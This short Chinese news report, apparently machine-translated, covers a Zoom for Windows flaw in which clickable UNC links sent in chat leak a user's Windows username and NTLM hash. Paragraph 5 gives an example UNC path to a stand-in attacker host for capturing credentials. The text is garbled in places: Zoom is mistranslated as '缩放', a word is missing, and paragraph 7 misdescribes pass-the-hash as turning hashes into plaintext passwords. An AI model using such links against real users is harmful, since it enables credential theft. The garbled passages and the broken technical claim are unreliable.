攻击者可以使用Zoom在没有任何警告的情况下窃取用户的Windows凭据

1、研究人员表示，为Windows安装Zoom软件的用户应该小心。一个广泛使用的软件，有一个漏洞，允许攻击者窃取您的操作系统证书。

2、同时，随着的普及，Zoom的使用也激增。由于大量的人在家工作，他们依靠Zoom与同事、客户和合作伙伴建立联系。

3、这些家庭用户中的许多人通过临时或临时的方式连接到敏感的工作网络，但这些方式无法获得企业防火墙。

4、该攻击通过使用Zoom聊天窗口向目标发送一串文本来工作，该窗口表示他们正在使用的Windows设备上的网络位置。

5、Windows缩放应用程序会自动将这些所谓的通用命名约定字符串(如\ \ attack.example.com/c $)转换为可点击的链接。如果目标单击网络上未完全锁定的链接，Zoom会将Windows用户名和相应的NTLM哈希发送到链接中包含的地址。

6、然后，攻击者可以使用这些凭据来访问共享的网络资源，如Outlook服务器和存储设备。通常，在对设备进行身份验证时，Windows网络上的资源将接受NTLM哈希。

7、这使得网络容易受到所谓的“pass hash”攻击，这种攻击可以将hash转换为对应的明文密码，而无需破解技术。

8、“这是Zoom的一个相当大的缺点，”安全精品店Hacker House的联合创始人Nate Heck告诉我。“这是一个非常小的错误。现在越来越多的人在家工作，更容易钻这个空子。”